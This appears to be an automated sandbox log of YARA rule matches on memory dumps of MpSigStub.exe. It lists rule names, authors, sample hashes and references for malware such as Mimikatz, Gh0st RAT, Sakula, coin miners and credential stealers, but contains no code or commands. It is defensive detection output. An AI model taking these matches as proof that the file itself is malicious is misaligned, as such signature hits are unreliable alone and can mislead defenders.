Source: 36.3.MpSigStub.exe.197a3f84db6.63.unpack, type: UNPACKEDPE	Matched rule: hacktool_macos_keylogger_logkext author = @mimeframe, description = LogKext is an open source keylogger for Mac OS X, a product of FSB software., reference = https://github.com/SlEePlEs5/logKext
Source: 36.3.MpSigStub.exe.197a3f84db6.63.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, reference = not set, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a3f84db6.63.unpack, type: UNPACKEDPE	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 36.3.MpSigStub.exe.197a3515a01.88.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_PDB_Path_Keywords date = 2019-10-04, author = Florian Roth, description = Detects suspicious PDB paths, reference = https://twitter.com/stvemillertime/status/1179832666285326337?s=20
Source: 36.3.MpSigStub.exe.197a4644266.106.raw.unpack, type: UNPACKEDPE	Matched rule: APT_DNSpionage_Karkoff_Malware_Apr19_1 date = 2019-04-24, hash4 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, hash3 = 5b102bf4d997688268bab45336cead7cdf188eb0d6355764e53b4f62e1cdf30c, hash2 = b017b9fc2484ce0a5629ff1fed15bca9f62f942eafbb74da6a40f40337187b04, hash1 = 6a251ed6a2c6a0a2be11f2a945ec68c814d27e2b6ef445f4b2c7a779620baa11, author = Florian Roth, description = Detects DNSpionage Karkoff malware, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
Source: 36.3.MpSigStub.exe.197a4644266.106.raw.unpack, type: UNPACKEDPE	Matched rule: DeepPanda_htran_exe date = 2015/02/08, author = Florian Roth, description = Hack Deep Panda - htran-exe, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 38e21f0b87b3052b536408fdf59185f8b3d210b9
Source: 36.3.MpSigStub.exe.197a4644266.106.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_DropperBackdoor_Keywords date = 2019-04-24, hash1 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, author = Florian Roth, description = Detects suspicious keywords that indicate a backdoor, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
Source: 36.3.MpSigStub.exe.197a4644266.106.raw.unpack, type: UNPACKEDPE	Matched rule: APT_MAL_HOPLIGHT_NK_HiddenCobra_Apr19_3 date = 2019-04-13, hash3 = ddea408e178f0412ae78ff5d5adf2439251f68cad4fd853ee466a3c74649642d, hash2 = 05feed9762bc46b47a7dc5c469add9f163c16df4ddaafe81983a628da5714461, hash1 = 2151c1977b4555a1761c12f151969f8e853e26c396fa1a7b74ccbaf3a48f4525, author = Florian Roth, description = Detects HOPLIGHT malware used by HiddenCobra APT group, reference = https://www.us-cert.gov/ncas/analysis-reports/AR19-100A
Source: 36.3.MpSigStub.exe.197a3ff325f.122.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a4245a35.92.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 36.3.MpSigStub.exe.197a4245a35.92.raw.unpack, type: UNPACKEDPE	Matched rule: HackTool_Samples description = Hacktool, score =
Source: 36.3.MpSigStub.exe.197a4245a35.92.raw.unpack, type: UNPACKEDPE	Matched rule: PS_AMSI_Bypass date = 2017-07-19, author = Florian Roth, description = Detects PowerShell AMSI Bypass, reference = https://gist.github.com/mattifestation/46d6a2ebb4a1f4f0e7229503dc012ef1, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = file
Source: 36.3.MpSigStub.exe.197a4fa658a.183.raw.unpack, type: UNPACKEDPE	Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 36.3.MpSigStub.exe.197a4fa658a.183.raw.unpack, type: UNPACKEDPE	Matched rule: APT_APT29_sorefang_modify_alphabet_custom_encode author = NCSC, description = Rule to detect SoreFang based on arguments passed into custom encoding algorithm function, reference = https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development, hash = 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
Source: 36.3.MpSigStub.exe.197a407e899.124.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a407e899.124.raw.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a4fa8d92.116.raw.unpack, type: UNPACKEDPE	Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 36.3.MpSigStub.exe.197a4fa8d92.116.raw.unpack, type: UNPACKEDPE	Matched rule: APT_APT29_sorefang_modify_alphabet_custom_encode author = NCSC, description = Rule to detect SoreFang based on arguments passed into custom encoding algorithm function, reference = https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development, hash = 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
Source: 36.3.MpSigStub.exe.197a4a13be1.57.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a407d495.123.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a407d495.123.raw.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a4df1a99.144.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 36.3.MpSigStub.exe.197a3f84db6.208.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a4dc49fa.186.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a47aa096.59.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 36.3.MpSigStub.exe.197a47aa096.59.raw.unpack, type: UNPACKEDPE	Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 36.3.MpSigStub.exe.197a497a30f.132.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 36.3.MpSigStub.exe.197a497a30f.132.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a42450e1.91.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 36.3.MpSigStub.exe.197a42450e1.91.raw.unpack, type: UNPACKEDPE	Matched rule: HackTool_Samples description = Hacktool, score =
Source: 36.3.MpSigStub.exe.197a42450e1.91.raw.unpack, type: UNPACKEDPE	Matched rule: PS_AMSI_Bypass date = 2017-07-19, author = Florian Roth, description = Detects PowerShell AMSI Bypass, reference = https://gist.github.com/mattifestation/46d6a2ebb4a1f4f0e7229503dc012ef1, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = file
Source: 36.3.MpSigStub.exe.197a433f6c2.83.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 36.3.MpSigStub.exe.197a433f6c2.83.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 36.3.MpSigStub.exe.197a433f6c2.83.unpack, type: UNPACKEDPE	Matched rule: GhostDragon_Gh0stRAT date = 2016-04-23, hash4 = b803381535ac24ce7c8fdcf6155566d208dfca63fd66ec71bbc6754233e251f5, hash3 = 6c7f8ba75889e0021c4616fcbee86ac06cd7f5e1e355e0cbfbbb5110c08bb6df, hash2 = 99ee5b764a5db1cb6b8a4f62605b5536487d9c35a28a23de8f9174659f65bcb2, hash1 = f9a669d22866cd041e2d520c5eb093188962bea8864fdfd0c0abb2b254e9f197, author = Florian Roth, description = Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report, reference = https://blog.cylance.com/the-ghost-dragon, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a433f6c2.83.unpack, type: UNPACKEDPE	Matched rule: GoldDragon_Aux_File date = 2018-02-03, author = Florian Roth, description = Detects export from Gold Dragon - February 2018, reference = https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a433f6c2.83.unpack, type: UNPACKEDPE	Matched rule: GoldDragon_RunnignRAT date = 2018-02-03, hash3 = 98ccf3a463b81a47fdf4275e228a8f2266e613e08baae8bdcd098e49851ed49a, hash2 = 5cbc07895d099ce39a3142025c557b7fac41d79914535ab7ffc2094809f12a4b, hash1 = 94aa827a514d7aa70c404ec326edaaad4b2b738ffaea5a66c0c9f246738df579, author = Florian Roth, description = Detects Running RAT malware from Gold Dragon report, reference = https://goo.gl/rW1yvZ, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a433f6c2.83.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a433f6c2.83.unpack, type: UNPACKEDPE	Matched rule: pdb_strings_Rescator date = 01/30/2014, author = @patrickrolsen, maltype = Target Attack, description = Rescator PDB strings within binaries, version = 0.3
Source: 36.3.MpSigStub.exe.197a4c03116.10.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a4c03116.10.raw.unpack, type: UNPACKEDPE	Matched rule: PUA_CryptoMiner_Jan19_1 date = 2019-01-31, hash1 = ede858683267c61e710e367993f5e589fcb4b4b57b09d023a67ea63084c54a05, author = Florian Roth, description = Detects Crypto Miner strings, reference = Internal Research
Source: 36.3.MpSigStub.exe.197a46f017a.58.raw.unpack, type: UNPACKEDPE	Matched rule: MiniRAT_Gen_1 date = 2018-01-22, hash5 = 675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd, hash4 = ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790, hash3 = ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2, hash2 = b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d, hash1 = 091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b, author = Florian Roth, description = Detects Mini RAT malware, reference = https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a46f017a.58.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_PDB_Strings_Keylogger_Backdoor date = 2018-03-23, author = Florian Roth, description = Detects PDB strings used in backdoors or keyloggers, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a4fa8d92.116.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 36.3.MpSigStub.exe.197a4f45162.112.raw.unpack, type: UNPACKEDPE	Matched rule: APT_DeputyDog_Fexel author = ThreatConnect Intelligence Research Team
Source: 36.3.MpSigStub.exe.197a407fe9d.110.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a407fe9d.110.raw.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a407e899.111.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a407e899.111.raw.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a3f84db6.95.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a33b6aa2.66.raw.unpack, type: UNPACKEDPE	Matched rule: Unspecified_Malware_Sep1_A1 date = 2017-09-12, hash1 = 28143c7638f22342bff8edcd0bedd708e265948a5fcca750c302e2dca95ed9f0, author = Florian Roth, description = Detects malware from DrqgonFly APT report, reference = https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a36f3b2a.215.unpack, type: UNPACKEDPE	Matched rule: MAL_Turla_Agent_BTZ date = 2018-04-12, hash1 = c4a1cd6916646aa502413d42e6e7441c6e7268926484f19d9acbf5113fc52fc8, author = Florian Roth, description = Detects Turla Agent.BTZ, reference = https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a36f3b2a.215.unpack, type: UNPACKEDPE	Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 36.3.MpSigStub.exe.197a327ab6a.200.raw.unpack, type: UNPACKEDPE	Matched rule: Oilrig_IntelSecurityManager date = 2018-01-19, author = Eyal Sela, description = Detects OilRig malware, reference = Internal Research
Source: 36.3.MpSigStub.exe.197a327ab6a.200.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a32a2a79.180.raw.unpack, type: UNPACKEDPE	Matched rule: XOR_4byte_Key date = 2015-12-15, author = Florian Roth, description = Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan), reference = http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a4644a6a.105.raw.unpack, type: UNPACKEDPE	Matched rule: APT_DNSpionage_Karkoff_Malware_Apr19_1 date = 2019-04-24, hash4 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, hash3 = 5b102bf4d997688268bab45336cead7cdf188eb0d6355764e53b4f62e1cdf30c, hash2 = b017b9fc2484ce0a5629ff1fed15bca9f62f942eafbb74da6a40f40337187b04, hash1 = 6a251ed6a2c6a0a2be11f2a945ec68c814d27e2b6ef445f4b2c7a779620baa11, author = Florian Roth, description = Detects DNSpionage Karkoff malware, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
Source: 36.3.MpSigStub.exe.197a4644a6a.105.raw.unpack, type: UNPACKEDPE	Matched rule: DeepPanda_htran_exe date = 2015/02/08, author = Florian Roth, description = Hack Deep Panda - htran-exe, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 38e21f0b87b3052b536408fdf59185f8b3d210b9
Source: 36.3.MpSigStub.exe.197a4644a6a.105.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_DropperBackdoor_Keywords date = 2019-04-24, hash1 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, author = Florian Roth, description = Detects suspicious keywords that indicate a backdoor, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
Source: 36.3.MpSigStub.exe.197a4644a6a.105.raw.unpack, type: UNPACKEDPE	Matched rule: APT_MAL_HOPLIGHT_NK_HiddenCobra_Apr19_3 date = 2019-04-13, hash3 = ddea408e178f0412ae78ff5d5adf2439251f68cad4fd853ee466a3c74649642d, hash2 = 05feed9762bc46b47a7dc5c469add9f163c16df4ddaafe81983a628da5714461, hash1 = 2151c1977b4555a1761c12f151969f8e853e26c396fa1a7b74ccbaf3a48f4525, author = Florian Roth, description = Detects HOPLIGHT malware used by HiddenCobra APT group, reference = https://www.us-cert.gov/ncas/analysis-reports/AR19-100A
Source: 36.3.MpSigStub.exe.197a46aeebe.25.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6
Source: 36.3.MpSigStub.exe.197a46aeebe.25.unpack, type: UNPACKEDPE	Matched rule: malware_sakula_xorloop author = David Cannings, description = XOR loops from Sakula malware, md5 = fc6497fe708dbda9355139721b6181e7
Source: 36.3.MpSigStub.exe.197a46aeebe.25.unpack, type: UNPACKEDPE	Matched rule: HackTool_Samples description = Hacktool, score =
Source: 36.3.MpSigStub.exe.197a46aeebe.25.unpack, type: UNPACKEDPE	Matched rule: RAT_Sakula date = 2015-10-13, author = Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings, description = Detects Sakula v1.0 RAT, reference = http://blog.airbuscybersecurity.com/public/YFR/sakula_v1x.yara
Source: 36.3.MpSigStub.exe.197a46aeebe.25.unpack, type: UNPACKEDPE	Matched rule: HackTool_MSIL_SharpHound_3 author = FireEye, description = The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = eeedc09570324767a3de8205f66a5295
Source: 36.3.MpSigStub.exe.197a46aeebe.25.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_SharpHound3 date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/BloodHoundAD/SharpHound3, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a46aeebe.25.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a46aeebe.25.unpack, type: UNPACKEDPE	Matched rule: MirageStrings author = Seth Hardy, description = Mirage Identifying Strings, last_modified = 2014-06-25
Source: 36.3.MpSigStub.exe.197a37e91da.72.raw.unpack, type: UNPACKEDPE	Matched rule: clearlog date = 2017-06-02, hash1 = 14093ce6d0fe8ab60963771f48937c669103842a0400b8d97f829b33c420f7e3, author = Florian Roth, description = Detects Fireball malware - file clearlog.dll, reference = https://goo.gl/4pTkGQ, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6
Source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE	Matched rule: malware_sakula_xorloop author = David Cannings, description = XOR loops from Sakula malware, md5 = fc6497fe708dbda9355139721b6181e7
Source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE	Matched rule: HackTool_Samples description = Hacktool, score =
Source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE	Matched rule: RAT_Sakula date = 2015-10-13, author = Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings, description = Detects Sakula v1.0 RAT, reference = http://blog.airbuscybersecurity.com/public/YFR/sakula_v1x.yara
Source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE	Matched rule: HackTool_MSIL_SharpHound_3 author = FireEye, description = The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = eeedc09570324767a3de8205f66a5295
Source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_SharpHound3 date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/BloodHoundAD/SharpHound3, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE	Matched rule: CredentialStealer_Generic_Backdoor date = 2017-06-07, hash1 = edb2d039a57181acf95bd91b2a20bd9f1d66f3ece18506d4ad870ab65e568f2c, author = Florian Roth, description = Detects credential stealer byed on many strings that indicate password store access, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE	Matched rule: MirageStrings author = Seth Hardy, description = Mirage Identifying Strings, last_modified = 2014-06-25
Source: 36.3.MpSigStub.exe.197a4fa658a.115.raw.unpack, type: UNPACKEDPE	Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 36.3.MpSigStub.exe.197a4fa658a.115.raw.unpack, type: UNPACKEDPE	Matched rule: APT_APT29_sorefang_modify_alphabet_custom_encode author = NCSC, description = Rule to detect SoreFang based on arguments passed into custom encoding algorithm function, reference = https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development, hash = 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
Source: 36.3.MpSigStub.exe.197a46f017a.26.raw.unpack, type: UNPACKEDPE	Matched rule: MiniRAT_Gen_1 date = 2018-01-22, hash5 = 675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd, hash4 = ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790, hash3 = ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2, hash2 = b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d, hash1 = 091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b, author = Florian Roth, description = Detects Mini RAT malware, reference = https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a46f017a.26.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_PDB_Strings_Keylogger_Backdoor date = 2018-03-23, author = Florian Roth, description = Detects PDB strings used in backdoors or keyloggers, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
